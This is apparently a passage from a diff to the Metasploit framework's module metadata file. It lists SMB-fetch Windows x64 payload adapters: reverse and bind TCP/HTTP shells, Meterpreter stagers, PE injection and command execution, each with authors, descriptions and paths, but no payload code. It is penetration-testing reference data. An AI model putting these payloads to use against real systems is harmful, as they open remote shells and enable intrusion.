"windows/x64/encrypted_shell", + "stager_refname": "windows/x64/encrypted_reverse_tcp" + }, + "payload_cmd/windows/smb/x64/encrypted_shell_reverse_tcp": { + "name": "SMB Fetch, Windows Encrypted Reverse Shell", + "fullname": "payload/cmd/windows/smb/x64/encrypted_shell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "Matt Graeber", + "Shelby Pace" + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nConnect back to attacker and spawn an encrypted command shell", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/encrypted_shell_reverse_tcp", + "check": false, + "post_auth": false, + 
"default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/encrypted_shell_reverse_tcp", + "staged": false + }, + "payload_cmd/windows/smb/x64/exec": { + "name": "SMB Fetch, Windows x64 Execute Command", + "fullname": "payload/cmd/windows/smb/x64/exec", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf " + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nExecute an arbitrary command (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/exec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/exec", + "staged": false + }, + "payload_cmd/windows/smb/x64/loadlibrary": { + "name": "SMB Fetch, Windows x64 LoadLibrary Path", + "fullname": "payload/cmd/windows/smb/x64/loadlibrary", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "scriptjunkie", + "sf " + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nLoad an arbitrary x64 library path", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/loadlibrary", + "check": 
false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/loadlibrary", + "staged": false + }, + "payload_cmd/windows/smb/x64/messagebox": { + "name": "SMB Fetch, Windows MessageBox x64", + "fullname": "payload/cmd/windows/smb/x64/messagebox", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "pasta " + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nSpawn a dialog via MessageBox using a customizable title, text & icon", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/messagebox", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/messagebox", + "staged": false + }, + "payload_cmd/windows/smb/x64/meterpreter/bind_ipv6_tcp": { + "name": "SMB Fetch, Windows x64 IPv6 Bind TCP Stager", + "fullname": "payload/cmd/windows/smb/x64/meterpreter/bind_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "skape ", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nListen for an IPv6 connection (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + 
"autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/meterpreter/bind_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/meterpreter/bind_ipv6_tcp", + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/bind_ipv6_tcp" + }, + "payload_cmd/windows/smb/x64/meterpreter/bind_ipv6_tcp_uuid": { + "name": "SMB Fetch, Windows x64 IPv6 Bind TCP Stager with UUID Support", + "fullname": "payload/cmd/windows/smb/x64/meterpreter/bind_ipv6_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "skape ", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nListen for an IPv6 connection with UUID Support (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/meterpreter/bind_ipv6_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/meterpreter/bind_ipv6_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": 
"windows/x64/bind_ipv6_tcp_uuid" + }, + "payload_cmd/windows/smb/x64/meterpreter/bind_named_pipe": { + "name": "SMB Fetch, Windows x64 Bind Named Pipe Stager", + "fullname": "payload/cmd/windows/smb/x64/meterpreter/bind_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "skape ", + "sf ", + "OJ Reeves", + "UserExistsError" + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nListen for a pipe connection (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/meterpreter/bind_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/meterpreter/bind_named_pipe", + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/bind_named_pipe" + }, + "payload_cmd/windows/smb/x64/meterpreter/bind_tcp": { + "name": "SMB Fetch, Windows x64 Bind TCP Stager", + "fullname": "payload/cmd/windows/smb/x64/meterpreter/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "skape ", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nListen for a connection (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": 
"Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/meterpreter/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/meterpreter/bind_tcp", + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/bind_tcp" + }, + "payload_cmd/windows/smb/x64/meterpreter/bind_tcp_rc4": { + "name": "SMB Fetch, Bind TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/cmd/windows/smb/x64/meterpreter/bind_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "skape ", + "sf ", + "OJ Reeves", + "hdm ", + "mihi", + "max3raza", + "RageLtMan" + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nConnect back to the attacker", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/meterpreter/bind_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/meterpreter/bind_tcp_rc4", + "staged": true, + "stage_refname": "windows/x64/meterpreter", + 
"stager_refname": "windows/x64/bind_tcp_rc4" + }, + "payload_cmd/windows/smb/x64/meterpreter/bind_tcp_uuid": { + "name": "SMB Fetch, Bind TCP Stager with UUID Support (Windows x64)", + "fullname": "payload/cmd/windows/smb/x64/meterpreter/bind_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "skape ", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nListen for a connection with UUID Support (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/meterpreter/bind_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/meterpreter/bind_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/bind_tcp_uuid" + }, + "payload_cmd/windows/smb/x64/meterpreter/reverse_http": { + "name": "SMB Fetch, Windows x64 Reverse HTTP Stager (wininet)", + "fullname": "payload/cmd/windows/smb/x64/meterpreter/reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "skape ", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nTunnel communication over HTTP (Windows x64 wininet)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + 
"URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/meterpreter/reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/meterpreter/reverse_http", + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/reverse_http" + }, + "payload_cmd/windows/smb/x64/meterpreter/reverse_https": { + "name": "SMB Fetch, Windows x64 Reverse HTTP Stager (wininet)", + "fullname": "payload/cmd/windows/smb/x64/meterpreter/reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "skape ", + "sf ", + "OJ Reeves", + "hdm ", + "agix", + "rwincey" + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nTunnel communication over HTTP (Windows x64 wininet)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/meterpreter/reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": 
"windows/x64/meterpreter/reverse_https", + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/reverse_https" + }, + "payload_cmd/windows/smb/x64/meterpreter/reverse_named_pipe": { + "name": "SMB Fetch, Windows x64 Reverse Named Pipe (SMB) Stager", + "fullname": "payload/cmd/windows/smb/x64/meterpreter/reverse_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "skape ", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nConnect back to the attacker via a named pipe pivot", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/meterpreter/reverse_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/meterpreter/reverse_named_pipe", + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/reverse_named_pipe" + }, + "payload_cmd/windows/smb/x64/meterpreter/reverse_tcp": { + "name": "SMB Fetch, Windows x64 Reverse TCP Stager", + "fullname": "payload/cmd/windows/smb/x64/meterpreter/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "skape ", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nConnect back to the attacker (Windows x64)", + "references": [ + 
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/meterpreter/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/meterpreter/reverse_tcp", + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/reverse_tcp" + }, + "payload_cmd/windows/smb/x64/meterpreter/reverse_tcp_rc4": { + "name": "SMB Fetch, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/cmd/windows/smb/x64/meterpreter/reverse_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "skape ", + "sf ", + "OJ Reeves", + "hdm ", + "mihi", + "max3raza", + "RageLtMan" + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nConnect back to the attacker", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/meterpreter/reverse_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + 
"adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/meterpreter/reverse_tcp_rc4", + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/reverse_tcp_rc4" + }, + "payload_cmd/windows/smb/x64/meterpreter/reverse_tcp_uuid": { + "name": "SMB Fetch, Reverse TCP Stager with UUID Support (Windows x64)", + "fullname": "payload/cmd/windows/smb/x64/meterpreter/reverse_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "skape ", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nConnect back to the attacker with UUID Support (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/meterpreter/reverse_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/meterpreter/reverse_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/reverse_tcp_uuid" + }, + "payload_cmd/windows/smb/x64/meterpreter/reverse_winhttp": { + "name": "SMB Fetch, Windows x64 Reverse HTTP Stager (winhttp)", + "fullname": "payload/cmd/windows/smb/x64/meterpreter/reverse_winhttp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "skape ", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 
payload from an SMB server.\nTunnel communication over HTTP (Windows x64 winhttp)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/meterpreter/reverse_winhttp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/meterpreter/reverse_winhttp", + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/reverse_winhttp" + }, + "payload_cmd/windows/smb/x64/meterpreter/reverse_winhttps": { + "name": "SMB Fetch, Windows x64 Reverse HTTPS Stager (winhttp)", + "fullname": "payload/cmd/windows/smb/x64/meterpreter/reverse_winhttps", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "skape ", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nTunnel communication over HTTPS (Windows x64 winhttp)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/meterpreter/reverse_winhttps", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": 
{}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/meterpreter/reverse_winhttps", + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/reverse_winhttps" + }, + "payload_cmd/windows/smb/x64/meterpreter_bind_named_pipe": { + "name": "SMB Fetch, Windows Meterpreter Shell, Bind Named Pipe Inline (x64)", + "fullname": "payload/cmd/windows/smb/x64/meterpreter_bind_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "UserExistsError", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nConnect to victim and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/meterpreter_bind_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/meterpreter_bind_named_pipe", + "staged": false + }, + "payload_cmd/windows/smb/x64/meterpreter_bind_tcp": { + "name": "SMB Fetch, Windows Meterpreter Shell, Bind TCP Inline (x64)", + "fullname": "payload/cmd/windows/smb/x64/meterpreter_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "OJ Reeves", + "sf " + ], + "description": "Fetch and execute an x64 
payload from an SMB server.\nConnect to victim and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/meterpreter_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/meterpreter_bind_tcp", + "staged": false + }, + "payload_cmd/windows/smb/x64/meterpreter_reverse_http": { + "name": "SMB Fetch, Windows Meterpreter Shell, Reverse HTTP Inline (x64)", + "fullname": "payload/cmd/windows/smb/x64/meterpreter_reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "OJ Reeves", + "sf " + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nConnect back to attacker and spawn a Meterpreter shell. 
Requires Windows XP SP2 or newer.", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/meterpreter_reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/meterpreter_reverse_http", + "staged": false + }, + "payload_cmd/windows/smb/x64/meterpreter_reverse_https": { + "name": "SMB Fetch, Windows Meterpreter Shell, Reverse HTTPS Inline (x64)", + "fullname": "payload/cmd/windows/smb/x64/meterpreter_reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "OJ Reeves", + "sf " + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nConnect back to attacker and spawn a Meterpreter shell. 
Requires Windows XP SP2 or newer.", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/meterpreter_reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/meterpreter_reverse_https", + "staged": false + }, + "payload_cmd/windows/smb/x64/meterpreter_reverse_ipv6_tcp": { + "name": "SMB Fetch, Windows Meterpreter Shell, Reverse TCP Inline (IPv6) (x64)", + "fullname": "payload/cmd/windows/smb/x64/meterpreter_reverse_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "OJ Reeves", + "sf " + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nConnect back to attacker and spawn a Meterpreter shell. 
Requires Windows XP SP2 or newer.", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/meterpreter_reverse_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/meterpreter_reverse_ipv6_tcp", + "staged": false + }, + "payload_cmd/windows/smb/x64/meterpreter_reverse_tcp": { + "name": "SMB Fetch, Windows Meterpreter Shell, Reverse TCP Inline x64", + "fullname": "payload/cmd/windows/smb/x64/meterpreter_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "OJ Reeves", + "sf " + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nConnect back to attacker and spawn a Meterpreter shell. 
Requires Windows XP SP2 or newer.", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/meterpreter_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/meterpreter_reverse_tcp", + "staged": false + }, + "payload_cmd/windows/smb/x64/peinject/bind_ipv6_tcp": { + "name": "SMB Fetch, Windows x64 IPv6 Bind TCP Stager", + "fullname": "payload/cmd/windows/smb/x64/peinject/bind_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "ege ", + "sf " + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nListen for an IPv6 connection (Windows x64)", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + 